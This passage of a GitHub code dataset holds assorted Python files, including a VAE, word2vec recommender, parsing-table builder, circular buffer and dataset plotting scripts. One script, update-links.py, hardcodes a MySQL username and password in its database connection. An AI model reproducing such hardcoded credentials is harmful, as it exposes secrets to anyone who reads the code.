initializer=0.)\n normed += beta\n normed = tf.identity(normed, name='%s_%s' % (scope, name))\n if return_mean:\n return normed, mean\n else:\n return normed\n","repo_name":"psailamul/contextual_circuit_bp","sub_path":"models/layers/normalization_functions/div_norm.py","file_name":"div_norm.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34715274596","text":"import tkinter\n\nfrom PIL import Image, ImageTk\nroot=tkinter.Tk()\nroot.geometry(\"1130x640\")\n\ntest=tkinter.PhotoImage(file='cricket2.png')\nlabel1=tkinter.Button(image=test)\nlabel1.place(x=5,y=5,height=100,width=100)\nroot.mainloop()","repo_name":"Ruwayed/Cricket-Scoreboard-using-python-customtkinter","sub_path":"pic.py","file_name":"pic.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18596366890","text":"import pandas as pd\nfrom gensim.models import Word2Vec\nfrom model.var_from_cfg import embedd_model_path\n\nclass ModelPred():\n def __init__(self):\n \"\"\"\n Initialize the model. This is called by __init__ and should not be called directly\n \"\"\"\n self.model = self.load_model()\n\n\n def load_model(self):\n \"\"\"\n Load model from file embedd.bin . This is used to train the model\n \n @return A word2vec model loaded\n \"\"\"\n\n # Load saved model\n model = Word2Vec.load(embedd_model_path)\n return model\n\n\n def predict(self, user_id):\n \"\"\"\n Predicts most similar books for a user. \n \n @param user_id - ID of user to predict\n \n @return DataFrame with book title and score for each book that is\n \"\"\"\n \n result = self.model.wv.most_similar(user_id)\n\n result_df = pd.DataFrame(result)\n result_df.columns = ['Book-Title', 'Score']\n\n print(result_df)\n\n return result_df\n\n\nif __name__ == '__main__':\n model_pred = ModelPred()\n model_pred.predict(1)\n\n","repo_name":"TranQuocViet236/RS","sub_path":"model/model_prediction.py","file_name":"model_prediction.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41143075200","text":"import torch\nimport pyro\nimport numpy as np\nfrom torch.nn import Module\nfrom torch.nn.functional import one_hot\nfrom networks import Decoder, Encoder\nfrom torch import tensor\nfrom pyro.distributions import OneHotCategorical, Normal, Bernoulli\nimport matplotlib.pyplot as plt\n\ndef ind_from_att(color, shape, scale, orientation, posX, posY):\n if type(color) != int:\n color = int(color)\n if type(shape) != int:\n shape = int(shape)\n if type(scale) != int:\n scale = int(scale)\n if type(orientation) != int:\n orientation = int(orientation)\n if type(posX) != int:\n posX = int(posX)\n if type(posY) != int:\n posY = int(posY)\n return (color)*3*6*40*32*32 + (shape )*6*40*32*32 + (scale)*40*32*32 + (orientation)*32*32 + (posX)*32 + posY \n\ndef dummy_from_label(label):\n sizes = [1, 3, 6, 40, 32, 32]\n dummy = []\n for i, length in enumerate(sizes):\n dummy.append(one_hot(tensor(label[:, i], dtype = torch.int64), int(length)))\n return torch.cat(dummy, -1).to(torch.float32)\n\ndef label_from_dummy(dummy):\n label = []\n label.append(0)\n label.append(dummy[1:4].max(0)[1])\n label.append(dummy[4:10].max(0)[1])\n label.append(dummy[10:50].max(0)[1])\n label.append(dummy[50:82].max(0)[1])\n label.append(dummy[82:114].max(0)[1])\n return label\n\nclass VAE(Module):\n '''\n Class that define the posterior distribution q(z|x) as the model \n with the decoder and the prior distribution q(x|z) as the guide \n using the encoder.\n \n Inputs: \n :pimg_dim: dimension of image vector\n :label_dim: dimension of label vector\n :latent_dim: dimension of Z space, output\n '''\n def __init__(self, latents_sizes, latents_names, img_dim = 4096, label_dim = 114, latent_dim = 200, use_CUDA = False):\n super(VAE, self).__init__()\n #creating networks\n self.encoder = Encoder(img_dim, label_dim, latent_dim)\n self.decoder = Decoder(img_dim, label_dim, latent_dim)\n self.img_dim = img_dim\n self.label_dim = label_dim\n self.latent_dim = latent_dim\n self.latents_sizes = latents_sizes\n self.latents_names = latents_names\n if use_CUDA:\n self.cuda()\n self.use_CUDA = use_CUDA\n \n def label_variable(self, label):\n new_label = []\n options = {'device': label.device, 'dtype': label.dtype}\n for i, length in enumerate(self.latents_sizes):\n prior = torch.ones(label.shape[0], length, **options) / (1.0 *length)\n new_label.append(pyro.sample(\"label_\" + str(self.latents_names[i]), \n OneHotCategorical(prior), \n obs = one_hot(tensor(label[:, i], dtype = torch.int64), int(length))))\n new_label = torch.cat(new_label, -1)\n return new_label.to(torch.float32).to(label.device)\n\n def model(self, img, label):\n pyro.module(\"decoder\", self.decoder)\n options = {'device': img.device, 'dtype': img.dtype}\n with pyro.plate(\"data\", img.shape[0]):\n z_mean = torch.zeros(img.shape[0], self.latent_dim, **options)\n z_variance = torch.ones(img.shape[0], self.latent_dim, **options)\n z_sample = pyro.sample(\"latent\", Normal(z_mean, z_variance).to_event(1))\n image = self.decoder.forward(z_sample, self.label_variable(label))\n pyro.sample(\"obs\", Bernoulli(image).to_event(1), obs = img)\n\n\n def guide(self, img, label):\n pyro.module(\"encoder\", self.encoder)\n with pyro.plate(\"data\", img.shape[0]):\n z_mean, z_variance = self.encoder.forward(img, self.label_variable(label))\n pyro.sample(\"latent\", Normal(z_mean, z_variance).to_event(1))\n \n def run_img(self, img, label, num = 1):\n label = label.reshape(1, -6)\n dummy_label = dummy_from_label(label)\n img = tensor(img.reshape(-1, 4096)).to(torch.float32)\n mean, var = self.encoder.forward(img, dummy_label)\n\n fig = plt.figure(figsize = (4, num*5))\n plots = []\n plots.append(plt.subplot(num+1, 1, 1))\n plots[0].set_title('Original image')\n plt.imshow(img.reshape(64, 64))\n \n for i in range(1, num):\n z_sample = Normal(mean, var).sample()\n vae_img = self.decoder.forward(z_sample, dummy_label)\n plots.append(plt.subplot(num+1, 1, i+1))\n plots[-1].set_title(str(i) +' - sample of latent space')\n plt.imshow(vae_img.detach().numpy().reshape(64, 64))\n plt.show()\n\n def change_attribute(self, img, label, attribute = 1):\n print('Attribute changed was ' + str(self.latents_names[attribute]))\n label = label.reshape(1, -6)\n new_label = np.copy(label)\n while (new_label == label).all():\n val = np.random.choice(list(range(self.latents_sizes[attribute])))\n new_label[0, attribute] = val\n dummy_label = dummy_from_label(label)\n new_dummy = dummy_from_label(new_label)\n img = tensor(img.reshape(-1, 4096)).to(torch.float32)\n mean, var = self.encoder.forward(img, dummy_label)\n \n fig = plt.figure(figsize = (4, 15))\n plots = []\n \n plots.append(plt.subplot(3, 1, 1))\n plots[0].set_title('Original image')\n plt.imshow(img.reshape(64, 64))\n \n z_sample = Normal(mean, var).sample()\n vae_img = self.decoder.forward(z_sample, dummy_label)\n plots.append(plt.subplot(3, 1, 2))\n plots[1].set_title('Sample with original attribute')\n plt.imshow(vae_img.detach().numpy().reshape(64, 64))\n \n z_sample = Normal(mean, var).sample()\n vae_img = self.decoder.forward(z_sample, new_dummy)\n plots.append(plt.subplot(3, 1, 3))\n plots[2].set_title('Sample with changed attribute')\n plt.imshow(vae_img.detach().numpy().reshape(64, 64))\n plt.show()\n\n","repo_name":"GiovaniValdrighi/inferencia_causal","sub_path":"vae/vae_build.py","file_name":"vae_build.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32842300161","text":"import random\nimport matplotlib.pyplot as plt\nimport pickle \nimport os\nimport json\nimport pandas as pd\nfrom collections import Counter\nimport pdb\n\nif os.path.exists(\"../data/pico_dict.pickle\"):\n with open(\"../data/pico_dict.pickle\", \"rb\") as f:\n dataset = pickle.load(f)\n\nrandom.seed(50)\n# Shuffle and split the dataset into train_data, valid_data, and test_data\nclass_list = list(dataset.keys())\n# strings_to_remove = ['iv-cont-q1', 'cv-cont-q1', 'iv-cont-q3', 'cv-cont-q3']\n# class_list = list(filter(lambda x: x not in strings_to_remove, class_list))\nrandom.shuffle(class_list)\nnum_classes = len(class_list)\n\ntrain_classes = class_list[:num_classes // 2]\nvalid_classes = class_list[num_classes // 2:(num_classes * 3) // 4]\ntest_classes = class_list[(num_classes * 3) // 4:]\n\ntrain_data = {k: dataset[k] for k in train_classes}\nvalid_data = {k: dataset[k] for k in valid_classes}\ntest_data = {k: dataset[k] for k in test_classes}\n\n# Count the number of annotations in each data set\ntrain_counts = {k: len(v) for k, v in train_data.items()}\nvalid_counts = {k: len(v) for k, v in valid_data.items()}\ntest_counts = {k: len(v) for k, v in test_data.items()}\n\ncounts_dict = {key: len(annotations) for key, annotations in dataset.items()}\n\ndef plot_freq_5_5():\n # Define the JSONL files\n jsonl_files = {\n 'Train': '/work3/s174450/data/pico-episode-data/inter/pico_5_5_train_50.jsonl',\n 'Dev': '/work3/s174450/data/pico-episode-data/inter/pico_5_5_dev_50.jsonl',\n 'Test': '/work3/s174450/data/pico-episode-data/inter/pico_5_5_test_50.jsonl'\n }\n\n counts_dict = {\n 'Train': train_counts,\n 'Dev': valid_counts,\n 'Test': test_counts\n }\n # Reverse the domain mapping to create an entity-domain mapping\n entity_domain_mapping = {entity: domain for domain, entities in domains.items() for entity in entities}\n # Initialize a dictionary for storing the domain counts\n domain_counts = {domain: [0, 0, 0] for domain in domains}\n # Parse the JSONL files\n for dataset, dict_counts in counts_dict .items():\n for key, item in dict_counts.items():\n if key in entity_domain_mapping:\n domain_counts[entity_domain_mapping[key]][list(counts_dict.keys()).index(dataset)] += item\n # for dataset, jsonl_file in jsonl_files.items():\n # with open(jsonl_file, 'r') as file:\n # for line in file:\n # # Parse the episode\n # episode = json.loads(line)\n # # Count the instances of each domain\n # for entity in episode['types']:\n # if entity in entity_domain_mapping:\n # domain_counts[entity_domain_mapping[entity]][list(jsonl_files.keys()).index(dataset)] += 10\n # Convert the domain count dictionary to a DataFrame\n pdb.set_trace()\n df = pd.DataFrame.from_dict(domain_counts, orient='index', columns=jsonl_files.keys())\n df = df.drop(\"O\", errors='ignore')\n # Create the bar plot\n df.plot(kind='bar', stacked=False, figsize=(10, 7), rot=0)\n\n # Set the title and labels\n plt.title(\"Fine-grained Counts in Different Datasets for 5-Way 5-Shots\")\n plt.xlabel(\"\")\n plt.ylabel(\"Number of unique annotations\")\n\n # Show the plot\n plt.savefig('images/barplot_5_1_50.png')\n\n\ndef plot_train_dev_test_freq():\n \"\"\"\n Plots the frequencies of annotations in the training, validation, and test datasets.\n\n The function takes three dictionaries as input: train_counts, valid_counts, and test_counts.\n Each dictionary contains keys representing different entities from the PICO dataset, and the\n values are the frequencies of annotations for each entity.\n\n The function generates three bar charts, one for each dataset, showing the frequencies of\n annotations for each entity.\n\n The resulting plots are saved as an image in the 'images' directory.\n\n Parameters:\n train_counts (dict): Dictionary containing frequencies of annotations in the training dataset.\n valid_counts (dict): Dictionary containing frequencies of annotations in the validation dataset.\n test_counts (dict): Dictionary containing frequencies of annotations in the test dataset.\n\n Returns:\n None\n \"\"\"\n # Plot the counts of annotations in each data set\n fig, ax = plt.subplots(3, 1, figsize=(10, 15))\n ax[0].bar(train_counts.keys(), train_counts.values())\n ax[0].set_title('Training Data')\n ax[0].set_ylabel('Frequency')\n ax[0].set_ylim([0, 1100])\n ax[0].set_xticklabels(train_counts.keys(), rotation=45, ha=\"right\") # Rotate x-axis labels\n\n ax[1].bar(valid_counts.keys(), valid_counts.values())\n ax[1].set_title('Validation Data')\n ax[1].set_ylabel('Frequency')\n ax[1].set_ylim([0, 1100])\n\n ax[2].bar(test_counts.keys(), test_counts.values())\n ax[2].set_title('Test Data')\n ax[2].set_ylabel('Frequency')\n ax[2].set_ylim([0, 1100])\n\n plt.tight_layout()\n plt.savefig('images/Freq.png')\n\ndef plot_all_freq():\n \"\"\"\n Plots a bar chart showing the number of text+annotations are available for each entity in PICO.\n\n The resulting plot is saved as an image in the 'images' directory.\n\n Parameters:\n counts_dict (dict): PICO data set dictionary with all entities.\n\n Returns:\n None\n \"\"\"\n keys = counts_dict.keys()\n values = counts_dict.values()\n\n plt.figure(figsize=(12, 6))\n plt.bar(keys, values)\n plt.xticks(rotation=90)\n plt.xlabel('Keys')\n plt.ylabel('Number of Items')\n plt.title('Number of Items in Each Key')\n plt.tight_layout()\n plt.savefig('images/all_freq.png')\n\ndef plot_text_length():\n \"\"\"\n Plots histograms of tokenized text lengths for training, validation, and testing datasets.\n\n The function extracts the text lengths from the provided data dictionaries and generates histograms\n to visualize the distribution of text lengths.\n\n The resulting histograms are saved as images in the 'images' directory.\n\n Parameters:\n train_data (dict): Dictionary containing training data.\n valid_data (dict): Dictionary containing validation data.\n test_data (dict): Dictionary containing testing data.\n\n Returns:\n None\n \"\"\"\n def extract_text_lengths(data):\n text_lengths = []\n for tuples_list in data.values():\n for item in tuples_list:\n for text, annotation in item:\n text_lengths.append(len(text))\n return text_lengths\n\n text_lengths_train = extract_text_lengths(train_data)\n text_lengths_dev = extract_text_lengths(valid_data)\n text_lengths_test = extract_text_lengths(test_data)\n\n def plot_histogram(text_lengths, title, file_type):\n plt.figure()\n plt.hist(text_lengths, bins=25, edgecolor='black')\n plt.xlabel('Text Length')\n plt.ylabel('Frequency')\n plt.title(title)\n plt.savefig(f'images/sequence_length_hist_{file_type}.png')\n\n plot_histogram(text_lengths_train, 'Histogram of Tokenized Text Lengths for Training', 'train')\n plot_histogram(text_lengths_dev, 'Histogram of Tokenized Text Lengths for Validation', 'dev')\n plot_histogram(text_lengths_test, 'Histogram of Tokenized Text Lengths for Testing', 'test')\n\ndef plot_pico_freq_jsonl():\n \"\"\"\n Plots the frequencies of annotation types in three JSONL files: pico_5_1_train.jsonl,\n pico_5_1_dev.jsonl, and pico_5_1_test.jsonl.\n\n The function reads the JSONL files, extracts the annotation types, counts their occurrences,\n and generates bar plots showing the frequencies for each file.\n\n The resulting plots are saved as images in the 'images' directory.\n\n Parameters:\n None\n\n Returns:\n None\n \"\"\"\n # Step 1: Read the JSONL files and parse them into dictionaries\n data_train, data_dev, data_test = [], [], []\n\n with open(\"data/pico-episode-data/pico_5_1_train.jsonl\", \"r\") as file:\n for line in file:\n data_train.append(json.loads(line))\n\n with open(\"data/pico-episode-data/pico_5_1_dev.jsonl\", \"r\") as file:\n for line in file:\n data_dev.append(json.loads(line))\n\n with open(\"data/pico-episode-data/pico_5_1_test.jsonl\", \"r\") as file:\n for line in file:\n data_test.append(json.loads(line))\n\n # Step 2: Extract the annotation types\n def extract_annotation_types(data):\n annotation_types = []\n for entry in data:\n annotation_types.extend(entry[\"types\"])\n return annotation_types\n\n annotation_types_train = extract_annotation_types(data_train)\n annotation_types_dev = extract_annotation_types(data_dev)\n annotation_types_test = extract_annotation_types(data_test)\n pdb.set_trace()\n # Step 3: Count the occurrences of each annotation type\n type_counts_train = Counter(annotation_types_train)\n type_counts_dev = Counter(annotation_types_dev)\n type_counts_test = Counter(annotation_types_test)\n\n # Step 4: Plot the annotation types and their frequencies\n def plot_annotation_types(type_counts, title, type):\n types = type_counts.keys()\n counts = type_counts.values()\n plt.figure()\n plt.bar(types, counts)\n plt.xlabel(\"Annotation Types\")\n plt.ylabel(\"Frequency\")\n plt.title(title)\n plt.xticks(rotation=45)\n plt.tight_layout()\n plt.savefig(f'images/pico_freq_jsonl_{type}.png')\n\n plot_annotation_types(type_counts_train, \"Annotation Type Frequencies (Train)\", 'train')\n plot_annotation_types(type_counts_dev, \"Annotation Type Frequencies (Dev)\", 'dev')\n plot_annotation_types(type_counts_test, \"Annotation Type Frequencies (Test)\", 'test')\n\n\n\nif __name__ == '__main__':\n domains = json.load(open(\"/work3/s174450/data/entity_types_pico.json\"))\n plot_freq_5_5()\n","repo_name":"DeterjoSimon/NER_project","sub_path":"freq_plot.py","file_name":"freq_plot.py","file_ext":"py","file_size_in_byte":9818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31736723552","text":"from collections import defaultdict\nfrom pathlib import Path\n\nhere = Path(__file__).parent\n\ngrid = []\nfp = open(here / 'input.txt', 'r')\nfor line in fp:\n row = []\n for c in line.strip():\n row.append(int(c))\n grid.append(row)\nfp.close()\n\n\nmaxEachDirection = defaultdict(list)\n# l, r, u, d\n\nROWS, COLS = len(grid), len(grid[0])\n\nfor r in range(ROWS):\n maxValues = [-1] * ROWS\n for c in range(COLS):\n maxEachDirection[(r, c)].append(maxValues[r])\n maxValues[r] = max(maxValues[r], grid[r][c])\n\n maxValues = [-1] * ROWS\n for c in range(COLS - 1, -1, -1):\n maxEachDirection[(r, c)].append(maxValues[r])\n maxValues[r] = max(maxValues[r], grid[r][c])\n\nfor c in range(COLS):\n maxValues = [-1] * COLS\n for r in range(ROWS):\n maxEachDirection[(r, c)].append(maxValues[c])\n maxValues[c] = max(maxValues[c], grid[r][c])\n\n maxValues = [-1] * COLS\n for r in range(ROWS - 1, -1, -1):\n maxEachDirection[(r, c)].append(maxValues[c])\n maxValues[c] = max(maxValues[c], grid[r][c])\n\ncount = 0\nfor r in range(ROWS):\n for c in range(COLS):\n minSurrounding = min(maxEachDirection[(r, c)])\n visible = False\n if grid[r][c] > minSurrounding:\n count += 1\n visible = True\n # print(f\"{grid[r][c]} vs {minSurrounding} {visible}\", end=\" | \")\n print()\n\n \nprint(count)","repo_name":"kingstarfly/aoc2022","sub_path":"8/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20338537192","text":"class FirstCircBuf:\n \"\"\"Класс кольцевой буфер.\n Плюсы: простота и читабельность\n Недостатки: при закольцовывании буфера\n значения индексов(переменные tail_index и head_index)\n следуют друг за другом, ссылаясь на одно и то же значение,\n следовательно можно избавиться от одного из них\n\n >>> buffer = FirstCircBuf(4)\n >>> buffer.enqueue(1)\n >>> buffer.enqueue(2)\n >>> buffer.enqueue(3)\n >>> buffer.enqueue(4)\n >>> buffer.enqueue(5)\n >>> buffer.enqueue(6)\n >>> buffer.enqueue(7)\n >>> buffer.enqueue(8)\n >>> buffer.dequeue(3)\n [5, 6, 7]\n \"\"\"\n def __init__(self, capacity: int):\n self.buffer: list = []\n self.capacity = capacity\n self.head_index = self.tail_index = 0\n\n def enqueue(self, num: int):\n\n if self.tail_index >= self.capacity:\n self.buffer[self.tail_index % self.capacity] = num\n\n elif self.tail_index < self.capacity:\n self.buffer.append(num)\n\n self.tail_index += 1\n\n if len(self.buffer) == self.capacity:\n self.head_index = self.tail_index % self.capacity\n\n def dequeue(self, size_to_read: int):\n if size_to_read > len(self.buffer):\n return None\n\n result_to_read = []\n\n index = self.head_index\n while size_to_read > 0 and index < len(self.buffer):\n result_to_read.append(self.buffer[index])\n index += 1\n size_to_read -= 1\n index = 0\n\n while index < size_to_read:\n result_to_read.append(self.buffer[index])\n index += 1\n return result_to_read\n\n\nclass SecondCircBuf:\n \"\"\"Класс кольцевой буфер.\n Плюсы: не включает в себя избыточного числа переменных\n Минусы: Явное лучше неявного\n\n >>> buffer = SecondCircBuf(4)\n >>> buffer.enqueue(1)\n >>> buffer.enqueue(2)\n >>> buffer.enqueue(3)\n >>> buffer.enqueue(4)\n >>> buffer.enqueue(5)\n >>> buffer.enqueue(6)\n >>> buffer.enqueue(7)\n >>> buffer.enqueue(8)\n >>> buffer.dequeue(3)\n [5, 6, 7]\n \"\"\"\n def __init__(self, capacity: int):\n self.buffer: list = []\n self.capacity = capacity\n self.tail_index = 0\n\n def enqueue(self, num: int):\n\n if self.tail_index >= self.capacity:\n self.buffer[self.tail_index % self.capacity] = num\n\n elif self.tail_index < self.capacity:\n self.buffer.append(num)\n\n self.tail_index += 1\n\n def dequeue(self, size: int):\n if size > len(self.buffer):\n return None\n\n result_to_read = []\n\n if len(self.buffer) < self.capacity:\n for value in self.buffer:\n result_to_read.append(value)\n return result_to_read\n\n index = self.tail_index % self.capacity\n while size > 0 and index < len(self.buffer):\n result_to_read.append(self.buffer[index])\n index += 1\n size -= 1\n\n index = 0\n while index < size:\n result_to_read.append(self.buffer[index])\n index += 1\n\n return result_to_read\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","repo_name":"buschwaker/wargaming","sub_path":"tasks/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12218484360","text":"\"\"\"Compares changes between remote and local data, allowing the user to make decisions.\"\"\"\nfrom collections import OrderedDict, defaultdict\n\nfrom loguru import logger\nfrom rich.console import Console\nfrom rich.prompt import Confirm, Prompt\nfrom rich.table import Table\n\nfrom qw.design_stages.main import DesignStages, get_local_stages, get_remote_stages\nfrom qw.local_store.main import LocalStore\nfrom qw.remote_repo.service import GitService\n\n\nclass ChangeHandler:\n \"\"\"Allow user interaction to manage changes between local and remote design stage data.\"\"\"\n\n def __init__(self, service: GitService, store: LocalStore):\n \"\"\"Create ChangeHandler instance.\"\"\"\n self._service = service\n self._store = store\n\n def combine_local_and_remote_items(self) -> list[DesignStages]:\n \"\"\"Compare local and remote design stages and prompt on any differences.\"\"\"\n paired = self._pair_remote_and_local()\n\n output_items = []\n for _internal_id, pair in paired.items():\n remote_item: DesignStages | None = pair.get(\"remote\")\n local_item: DesignStages | None = pair.get(\"local\")\n if not local_item:\n logger.info(\n f\"New remote item: {remote_item} will be saved to local store.\",\n )\n output_items.append(remote_item)\n continue\n\n if not remote_item:\n output_items.extend(self._prompt_to_remove_local_item(local_item))\n continue\n\n diff = local_item.diff(remote_item)\n if not diff:\n output_items.append(local_item)\n continue\n\n output_items.append(\n self._prompt_for_version_change(\n diff,\n local_item,\n remote_item,\n ),\n )\n\n return output_items\n\n def _pair_remote_and_local(self) -> dict[int, dict[str, DesignStages]]:\n paired_data: dict[int, dict[str, DesignStages]] = defaultdict(dict)\n\n for stage in get_remote_stages(self._service):\n paired_data[stage.internal_id][\"remote\"] = stage\n\n for stage in get_local_stages(self._store):\n paired_data[stage.internal_id][\"local\"] = stage\n\n return OrderedDict(sorted(paired_data.items()))\n\n @staticmethod\n def _prompt_to_remove_local_item(local_item) -> list[DesignStages]:\n if Confirm.ask(\n f\"{local_item} no longer exists in remote, would you like to remove it from the local store?\",\n ):\n return []\n return [local_item]\n\n def _prompt_for_version_change(\n self,\n diff: dict[str, dict],\n local_item: DesignStages,\n remote_item: DesignStages,\n ):\n table = Table(\n title=f\"Changes detected for {local_item}:\",\n show_lines=True,\n expand=True,\n )\n table.add_column(\"Field\", justify=\"right\", style=\"cyan\")\n table.add_column(\"Local\", justify=\"left\", style=\"magenta\")\n table.add_column(\n f\"{self._service.username}/{self._service.reponame}\",\n justify=\"left\",\n style=\"green\",\n )\n for field, differences in diff.items():\n table.add_row(field, differences[\"self\"], differences[\"other\"])\n\n console = Console()\n console.print(table)\n prompt = \"\\n\".join(\n [\n \"Would you like to:\",\n \"n (Don't save the update)\",\n \"u (Update, but trivial change so don't increment the version)\",\n \"i (Update and increment the version)\",\n \"\",\n ],\n )\n\n response = Prompt.ask(prompt, choices=[\"n\", \"u\", \"i\"])\n if response == \"n\":\n return local_item\n if response == \"u\":\n return remote_item\n remote_item.version += 1\n return remote_item\n","repo_name":"UCL-ARC/qw","sub_path":"src/qw/changes.py","file_name":"changes.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21406346138","text":"from toolkit.modules.make_follow_sets import follow_sets\nfrom toolkit.modules.make_first_sets import first_sets\nfrom toolkit.modules.grammar import is_terminal\nfrom tabulate import tabulate\n\n\ndef parsing_table(pgrammar, fs, fls, error_recovery=True):\n \"\"\"\n Input:\n pgrammar: parsed grammar\n fs: first sets\n fls: follow sets\n error_recovery: fill parsing table with pop/scan values for error cells\n \"\"\"\n\n # nonterminals with eps in their first sets\n nullables = [k for k in pgrammar.keys() if \"eps\" in fs[k]]\n\n # TODO: rewrite this loop better\n terminals = set()\n for prod in pgrammar.values():\n for rule in prod:\n for sym in rule.split():\n if is_terminal(sym, pgrammar) and sym != \"eps\":\n terminals.add(sym)\n\n if not terminals:\n return\n\n terminals = list(terminals)\n terminals.append(\"$\")\n\n table = []\n for nt, prod in pgrammar.items():\n row = [None] * len(terminals)\n for rule in prod:\n for sym in rule.split():\n eps = False\n if sym == \"eps\":\n eps = True\n else:\n if is_terminal(sym, pgrammar):\n row[terminals.index(sym)] = \"{} -> {}\".format(nt, rule)\n else:\n for fse in fs[sym]:\n if fse == \"eps\":\n eps = True\n else:\n row[terminals.index(fse)] = \"{} -> {}\".format(nt, rule)\n\n if eps:\n for flse in fls[nt]:\n row[terminals.index(flse)] = \"{} -> {}\".format(nt, rule)\n\n if not eps and sym not in nullables:\n break\n\n table.append([nt] + row)\n\n if error_recovery:\n for row in table:\n # row[0] is the non-terminal\n for flse in fls[row[0]]:\n # + 1 because we also added a non-terminal\n ix = terminals.index(flse) + 1\n if row[ix] is None:\n row[ix] = \"Pop({})\".format(row[0])\n\n # fill remaining values with 'scan'\n for i in range(1, len(row)):\n if row[i] is None:\n row[i] = \"scan\"\n\n return tabulate(table, headers=[\"input\"] + terminals)\n\n\n# if __name__ == \"__main__\":\n# import grammar as gm\n\n# # grammar = \"\"\"\n# # X -> a X | g | Y Z | eps\n# # Y -> d | u Y | eps\n# # Z -> i | eps\n# # \"\"\"\n\n# grammar = \"\"\"\n# E -> T E'\n# E' -> + T E' | eps\n# T -> F T'\n# T' -> * F T' | eps\n# F -> id | ( E )\n# \"\"\"\n\n# pgrammar = gm.parse(grammar)\n\n# fs = first_sets(pgrammar)\n# fls = follow_sets(\"E\", pgrammar, fs)\n\n# # print(\"first sets:\")\n# # gm.set_print(fs)\n# # print(\"follow sets:\")\n# # gm.set_print(fls)\n\n# make_parsing_table(pgrammar, fs, fls)\n","repo_name":"candh/compiler-toolkit","sub_path":"toolkit/modules/make_parsing_table.py","file_name":"make_parsing_table.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11479307327","text":"\nimport _mysql\nimport os\nimport os.path\n\ndb = _mysql.connect(host = \"acbbdb1.picr.man.ac.uk\", user = \"nsmd\", passwd = \"nsmdP123\", db = \"nsmd\")\ndata_root = \"/data/snc/nstephenson/nsmd/results\"\n\ndirs = os.listdir(data_root)\n\ndef is_numerical_dir(name):\n\n fullname = os.path.join(data_root, name)\n if not os.path.isdir(fullname):\n return False\n try:\n n = int(name)\n return True\n except ValueError:\n return False\n\ndirs = filter(is_numerical_dir, dirs)\n\nfor d in dirs:\n \n db.query(\"select gene, mutation from sequences inner join kinases on kinaseid = kinases.id inner join genes on gene_id = genes.id where sequences.id = %s\" % d)\n rows = db.store_result().fetch_row(maxrows=0)\n\n if len(rows) == 0:\n print >>sys.stderr, \"Ignore directory\", d, \"not in DB\"\n continue\n elif len(rows) > 1:\n raise Exception(\"Duplicate entries in DB for %s\" % d)\n\n protdir = os.path.join(data_root, \"by-protein\", rows[0][0])\n try:\n os.makedirs(protdir)\n except OSError as e:\n if e.errno != 17: # Already exists\n raise e\n \n linkname = os.path.join(protdir, rows[0][1].replace(\" \", \"_\"))\n\n try:\n os.symlink(os.path.join(data_root, d), linkname)\n except OSError as e:\n if e.errno != 17:\n raise e\n\n","repo_name":"natalie-stephenson/Kinase-Structure-Mutational-Screen","sub_path":"update-links.py","file_name":"update-links.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45536025427","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom codecs import open\nimport os\nimport re\n\nfrom setuptools import find_packages, setup\n\n\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\nwith open('README.rst', encoding='utf-8') as readme_file:\n readme = readme_file.read()\n\n\ndef get_meta():\n meta_re = re.compile(r\"(?P<name>__\\w+__) = '(?P<value>[^']+)'\")\n meta_d = {}\n with open(os.path.join(current_dir, 'aiobearychat/__init__.py'),\n encoding='utf8') as fp:\n for match in meta_re.finditer(fp.read()):\n meta_d[match.group('name')] = match.group('value')\n return meta_d\n\n\nrequirements = [\n 'attrs',\n]\n\nextras_require = {\n '': requirements,\n 'aiohttp': 'aiohttp',\n}\n\nmeta_d = get_meta()\nsetup(\n name='aiobearychat',\n version=meta_d['__version__'],\n description='BearyChat 异步 Python SDK',\n long_description=readme,\n author='mozillazg',\n author_email='mozillazg101@gmail.com',\n url='https://github.com/mozillazg/aiobearychat',\n packages=find_packages(\n exclude=['*.tests', '*.tests.*', 'tests.*', 'tests']\n ),\n package_dir={'aiobearychat':\n 'aiobearychat'},\n include_package_data=True,\n install_requires=requirements,\n extras_require=extras_require,\n license='MIT',\n zip_safe=False,\n keywords='aiobearychat',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: Implementation :: CPython',\n ],\n)\n","repo_name":"mozillazg/aiobearychat","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39862261289","text":"import base64\nimport sys\n\nfrom algosdk import encoding\nfrom algosdk.constants import MIN_TXN_FEE\nfrom algosdk.future import template, transaction\nimport click\nfrom pyteal import *\n\nfrom algovault.client import get_algod, get_kmd, raw_signing_address, sha512_256\n\n# testnet app id\nDEFAULT_APP_ID = 46576018\n# 16 local bytes keys + 100k opt-in balance + 100k base balance\nMINIMUM_BALANCE = 16 * 50000 + 